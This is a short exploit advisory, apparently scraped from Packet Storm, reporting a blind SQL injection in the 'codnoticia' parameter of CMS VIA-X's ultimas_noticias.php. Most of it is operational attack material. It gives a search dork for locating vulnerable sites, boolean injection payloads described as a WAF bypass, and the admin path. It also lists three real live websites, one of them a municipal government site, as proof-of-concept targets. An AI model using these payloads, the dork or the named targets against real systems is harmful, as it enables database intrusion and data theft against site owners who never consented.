CMS VIA-X suffers from a remote blind SQL injection vulnerability. Note that this finding houses site-specific data.
c576b69c2407c32e44d916f75ae68e671126b59ddd77b7b21af755f15504f105[+] Blind Sql Injection on CMS VIA-X
[+] Date: 23/07/2014
[+] CWE Number : CWE-89
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.viax.com.br/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: ultimas_noticias.php
[+} Dork : inurl:ultimas_noticias.php?codnoticia=
[+] Exploit : http://host/ultimas_noticias.php?codnoticia=[BLIND SQL Injection]
ps:use "1'+and+1=2--+" and "1'+and+1=1--+" to bypass the waf protection.
[+] PoC: http://www.camaramuritiba.ba.gov.br/ultimas_noticias.php?codnoticia=37
http://www.vandelson.com.br/ultimas_noticias.php?codnoticia=53
http://www.fat.edu.br/ultimas_noticias.php?codnoticia=797
[+] Admin Page: http://host/admin/
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed